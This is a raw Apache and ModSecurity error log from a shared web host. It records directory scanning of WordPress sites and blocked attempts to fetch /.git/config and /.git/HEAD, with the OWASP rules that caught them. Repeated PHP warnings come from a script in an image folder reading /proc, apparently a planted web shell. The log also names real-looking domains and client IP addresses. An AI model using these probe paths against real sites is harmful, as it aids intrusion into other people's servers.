[Tue May 12 00:52:42.124488 2026] [autoindex:error] [pid 1605480:tid 1605535] [client 20.9.31.235:33560] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:53:11.846611 2026] [autoindex:error] [pid 1606352:tid 1606423] [client 20.9.31.235:39790] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:53:13.068350 2026] [autoindex:error] [pid 1605480:tid 1605535] [client 20.9.31.235:33560] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:53:25.226646 2026] [autoindex:error] [pid 1606352:tid 1606423] [client 20.9.31.235:39790] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:53:26.226345 2026] [autoindex:error] [pid 1605480:tid 1605535] [client 20.9.31.235:33560] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:53:34.637421 2026] [autoindex:error] [pid 1605480:tid 1605535] [client 20.9.31.235:33560] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:53:53.116537 2026] [autoindex:error] [pid 1606352:tid 1606423] [client 20.9.31.235:39790] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:53:54.127089 2026] [autoindex:error] [pid 1605480:tid 1605535] [client 20.9.31.235:33560] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:53:55.362784 2026] [autoindex:error] [pid 1605480:tid 1605535] [client 20.9.31.235:33560] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:54:45.035349 2026] [security2:error] [pid 1695975:tid 1696000] [client 43.159.62.163:38846] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/wp-content/uploads/2020/04/Capture-d"] [unique_id "agJeNdVI9ymHBxup749oawAAAJY"]
[Tue May 12 00:54:57.609870 2026] [autoindex:error] [pid 1606352:tid 1606423] [client 20.9.31.235:39790] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:54:58.692977 2026] [autoindex:error] [pid 1605480:tid 1605535] [client 20.9.31.235:33560] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:54:59.742695 2026] [autoindex:error] [pid 1605480:tid 1605535] [client 20.9.31.235:33560] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:55:18.204750 2026] [autoindex:error] [pid 1606352:tid 1606423] [client 20.9.31.235:39790] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:55:19.159711 2026] [autoindex:error] [pid 1630927:tid 1630930] [client 20.9.31.235:49772] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:55:20.158635 2026] [autoindex:error] [pid 1630927:tid 1630930] [client 20.9.31.235:49772] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:55:22.324001 2026] [autoindex:error] [pid 1630927:tid 1630939] [client 90.113.177.192:53303] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:55:22.404420 2026] [:error] [pid 1606352:tid 1606425] [client 90.113.177.192:53305] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:55:22.512387 2026] [:error] [pid 1691274:tid 1691290] [client 90.113.177.192:53307] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:55:22.594034 2026] [:error] [pid 1695975:tid 1695995] [client 90.113.177.192:53309] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:55:22.667720 2026] [:error] [pid 1605480:tid 1605522] [client 90.113.177.192:53311] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:55:22.746549 2026] [:error] [pid 1630927:tid 1630937] [client 90.113.177.192:53313] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:55:23.223048 2026] [:error] [pid 1606352:tid 1606426] [client 94.102.49.148:46612] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:55:26.515505 2026] [autoindex:error] [pid 1606352:tid 1606423] [client 20.9.31.235:39790] AH01276: Cannot serve directory /home/poledemo/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/48/task/48/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/48/task/48/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/48/task/48/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/48/task/48/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/48/task/48/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/48/task/48/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:55:27.439894 2026] [autoindex:error] [pid 1630927:tid 1630930] [client 20.9.31.235:49772] AH01276: Cannot serve directory /home/poledemo/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:55:32.724326 2026] [autoindex:error] [pid 1630927:tid 1630930] [client 20.9.31.235:49772] AH01276: Cannot serve directory /home/poledemo/public_html/wp-content/uploads/2021/02/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:55:36.085093 2026] [:error] [pid 1605480:tid 1605537] [client 66.249.75.44:54883] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 00:55:50.016445 2026] [autoindex:error] [pid 1630927:tid 1630930] [client 20.9.31.235:49772] AH01276: Cannot serve directory /home/poledemo/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:55:50.751682 2026] [security2:error] [pid 1605480:tid 1605539] [client 43.132.214.228:38944] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agJedh2Cvzd_nyNfUm80-wAAARE"]
[Tue May 12 00:55:56.321738 2026] [security2:error] [pid 1695975:tid 1695993] [client 43.132.214.228:47814] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/evaluation/"] [unique_id "agJefNVI9ymHBxup749oswAAAI8"], referer: https://www.castiglionecorporatefinance.fr/?p=996
PHP Warning:  filesize(): stat failed for /proc/83/task/83/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/83/task/83/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/83/task/83/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/83/task/83/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/83/task/83/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/83/task/83/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:56:10.165931 2026] [security2:error] [pid 1606352:tid 1606426] [client 43.165.126.130:44464] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/mobil-home-hawai/feed/"] [unique_id "agJeino_DFxNSZVmaX0ECAAAAMc"]
[Tue May 12 00:56:10.527519 2026] [security2:error] [pid 1691274:tid 1691293] [client 43.134.111.142:42162] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/downloads/APOE-CR-AG-2019.pdf"] [unique_id "agJeilfdQaraX_prmqf7NwAAABE"]
[Tue May 12 00:56:12.288982 2026] [autoindex:error] [pid 1630927:tid 1630953] [client 20.9.31.235:32257] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:56:13.317025 2026] [autoindex:error] [pid 1630927:tid 1630930] [client 20.9.31.235:49772] AH01276: Cannot serve directory /home/poledemo/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:56:18.286682 2026] [security2:error] [pid 1695975:tid 1695979] [client 104.28.227.186:10389] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "cpc-entreprises.com"] [uri "/.git/config"] [unique_id "agJektVI9ymHBxup749o5AAAAIE"]
[Tue May 12 00:56:18.286840 2026] [security2:error] [pid 1695975:tid 1695979] [client 104.28.227.186:10389] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "cpc-entreprises.com"] [uri "/.git/config"] [unique_id "agJektVI9ymHBxup749o5AAAAIE"]
[Tue May 12 00:56:18.287052 2026] [security2:error] [pid 1695975:tid 1695979] [client 104.28.227.186:10389] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "cpc-entreprises.com"] [uri "/.git/config"] [unique_id "agJektVI9ymHBxup749o5AAAAIE"]
[Tue May 12 00:56:18.491160 2026] [security2:error] [pid 1605480:tid 1605531] [client 104.28.227.186:10392] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "cpc-entreprises.com"] [uri "/.git/HEAD"] [unique_id "agJekh2Cvzd_nyNfUm81EwAAAQk"]
[Tue May 12 00:56:18.491473 2026] [security2:error] [pid 1605480:tid 1605531] [client 104.28.227.186:10392] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "cpc-entreprises.com"] [uri "/.git/HEAD"] [unique_id "agJekh2Cvzd_nyNfUm81EwAAAQk"]
[Tue May 12 00:56:18.491837 2026] [security2:error] [pid 1605480:tid 1605531] [client 104.28.227.186:10392] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "cpc-entreprises.com"] [uri "/.git/HEAD"] [unique_id "agJekh2Cvzd_nyNfUm81EwAAAQk"]
[Tue May 12 00:56:23.604568 2026] [security2:error] [pid 1605480:tid 1605527] [client 43.134.71.232:37842] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/category/reseaux-sociaux/"] [unique_id "agJelx2Cvzd_nyNfUm81GQAAAQU"]
[Tue May 12 00:56:31.569631 2026] [security2:error] [pid 1630927:tid 1630936] [client 129.226.152.67:52668] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/"] [unique_id "agJen2iGYYhUwDaJINnC0wAAAUY"], referer: http://www.piregwan-genesis.com
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704670/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704670/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704670/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704670/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704670/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704670/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:57:28.013113 2026] [security2:error] [pid 1630927:tid 1630949] [client 124.156.225.181:37264] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/informatique/logiciel/rainmeter/installation-ordinateur-a-hublot/"] [unique_id "agJe2GiGYYhUwDaJINnDJwAAAVM"]
[Tue May 12 00:57:34.088214 2026] [authz_core:error] [pid 1606352:tid 1606435] [client 47.128.125.57:13004] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/rest-api/error_log
[Tue May 12 00:57:48.634186 2026] [autoindex:error] [pid 1695975:tid 1695981] [client 8.229.191.19:43664] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:57:48.647692 2026] [autoindex:error] [pid 1606352:tid 1606432] [client 8.229.191.19:43650] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:57:48.768062 2026] [autoindex:error] [pid 1630927:tid 1630936] [client 8.229.191.19:49320] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:57:48.774884 2026] [autoindex:error] [pid 1691274:tid 1691295] [client 8.229.191.19:49322] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:57:48.920245 2026] [:error] [pid 1605480:tid 1605523] [client 8.229.191.19:43670] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:57:48.935990 2026] [:error] [pid 1630927:tid 1630946] [client 8.229.191.19:43682] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:57:49.198595 2026] [:error] [pid 1691274:tid 1691296] [client 8.229.191.19:49330] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:57:49.202564 2026] [:error] [pid 1695975:tid 1695997] [client 8.229.191.19:49342] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 00:57:51.083423 2026] [autoindex:error] [pid 1695975:tid 1695979] [client 34.34.253.69:19897] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 00:57:56.008652 2026] [autoindex:error] [pid 1691274:tid 1691277] [client 34.34.253.69:26630] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
